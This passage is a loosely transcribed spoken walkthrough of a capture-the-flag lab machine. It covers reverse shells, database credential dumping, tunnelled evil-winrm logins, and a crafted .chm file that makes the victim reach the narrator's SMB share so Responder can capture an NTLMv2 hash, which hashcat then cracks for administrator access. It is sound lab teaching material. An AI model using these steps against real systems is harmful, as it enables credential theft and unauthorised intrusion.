connect, hey, it did them both. Awesome. But we lost our shell. So we're going to call this tab tunnels, and then open up a new tab. Do nclvnp 9001, go back, and hit this again to get a new shell, because we need the password. So the password was in user, and if we look at db.php, we can get the password. So first I'm going to do mysql dash H, I think, 127.0.0.1 -u db user -p. Oh. -d for database, sniper -p. I think it's IP user password database is how I think that command works. -capital D. Let's see. NC 127.0.0.1 3306. That is MySQL. That should work. Is it lowercase h? There we go, lowercase h. So here we could do show tables, select star in users, select star in users. Wait, what? Tables in sniper. Use sniper. Select. Let's see. Okay. Select ID and users. MySQL select command. Man, that is a big brain fart if I'm forgetting this. It's like the most as basic as you get. From. Holy crap, I can't believe I forgot that. Just goes to show, never be scared to Google. And we can look at all the users. Mainly bunches of things that we created. Super user, This is the default password. We could see what this is. And I think test@1.com is not us. Let's see. Hashes.org. I think it was coding the Python that made me think in and not from. I don't know. I think it's search, not check. There we go. Oh my god. That is a pain to read. SVLMSER? Captcha. No crap. That's a bit better. X3VD XKD. There's the password. Super password. So that's the password for the super user in this. Doesn't really do anything. If you wanted to, you could log in. So let's go back to the website. /user. Log out. Admin, paste. Super user. Super user, paste the password. Still the same exact thing. But let's go exit the database. Go back here. Where is the password? Here it is. So cd opt evil winrm. And what was it? -u, Chris, -p, this, -i, 10, 10, 10, 151. See if this works. Nope. It's not 151. It's localhost. Because we're using Chisel. Establishing connection. And there we go. So here we go with evil winrm. So what did we say the last step was? The file. So I guess we have to go back to our Windows box and create a document that instead of executing code is just going to have him try to pull a file off a share and we'll respond to it and crack the password. So let's do that. Going back to our Commando machine, we can open up a Notepad++. We have it open here. File, new. And we just got to create a basic HTML page. So body, h1, please sub. Do the heading, it doesn't matter. Image source is equal to 1010 14.2 htb please sub dot jpeg. Like that. /body /html. There we go. That should be fine. File, save as. Let's save this to the desktop. All types, and we'll call this index.html. So now we open up that HTML workshop application. Program files, HTML help workshop, and file new, project, sure, name of it, test, HTML, where the file's located, desktop, like that. File, compile, file, sure. Cannot compile. File new. Let's see. This is a weird application. Let's start over. File. New. Project. Does this do anything? No. Specify the name of your project file. Desktop. Call this test. Already exist. Test 2. We want HTML files. That's what we want. Finish. Okay. File. Compile. Save all. Display. Cannot open. Test 2. Where is this file? Yeah, I can't open it because it doesn't exist. Properties, security, administrators. I can write to this. Let's try save project. Save all files. Sure. Compile. Project file. I don't know where that file went. test2.hhp. Is it in C:\\? Let's see. Users, IPsec. Let's close this and go through it slowly. File. New. Project. Specify the name of your project file and where you'd like it to be created. Well, I have been doing it on desktop and hasn't liked that. So let's do C:\test.hhp. Okay, include an HTML file. Now we can add a file from the desktop, which is index.html. Okay. Compile. Project file is going to be at C:\. Cannot open. It's not there. Right click, run as administrator. Project. Let's do new folder. Temp. C:\temp test.hhp. Okay. Hey, it created it. We have found that file. That is good. We are including index. Compile. Compiling? Compiled. Holy crap, that was painful. Copy. To the share. Have to make write access. chmod 777. SOV SMB. Try again. Let's put that back to 755. And let's see. I guess we can copy it first and then disable. I think it was test. So let's move test.chm, root, HTTP, boxes, sniper, dub, and we'll call this responder.chm. There we go. I think that is good. Look at tunnels. We are still listening, or still have our HTTP server up. So let's go back to Chris. Docs. This one can be exited. We got to stop SMB. And then we can do responder. ton 0. Can't listen on 80, that's fine. We only want SMB. So now we can do wget 10.10.14.2. And even WinRM itself does have like file upload capability, so you could use that, but might as well just do wget. Responder.chm -o responder.chm. dir. It now exists. TCP dump -i ton 0. Oh, don't need to debug it because we definitely got a hit. So here we go. Administrators here. We can copy this, go here, SSH to the Kraken, which again, just another box in my house. I don't like cracking in a VM because VMs are slow. It goes against the whole methodology of cracking. So you could do it on your host. I just don't because I may drop frames since I'm recording. And of course, this box has a few GPUs. That helps. So v hashes /sniper. Paste this. And we'll do hashcat -- example hashes less. I'm going to search for NTLM because I think this is NTLM v2. That's what it looks like, 5600. Or, yeah, I think it's 5600. Let's try this. /hashcat -m 5600 hashes sniper opt word list rocku. Let's see if this works. Hopefully it does. Initializing, and there we go. It cracked. Butterfly !1. So if we get out of hashcat and we do crackmap exec 10.10.10 SMB-U administrator-P that, it'll now say this box has been pwned. There we go. So we could, at this point, do psexec. You could also do Windows remoting again with evil WinRM, but 445 was open to us. So might as well just do psexec or wmi-exec if you don't want to drop binary, and do administrator at 10.10.10 paste the password, and we are now on the box as administrator, pretty much doing it 100% differently. So hope you guys enjoyed both paths. Take care, and I will see you next week.